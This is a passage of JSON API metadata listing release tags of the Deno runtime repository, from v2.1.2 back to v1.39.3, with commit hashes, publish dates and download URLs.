3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","k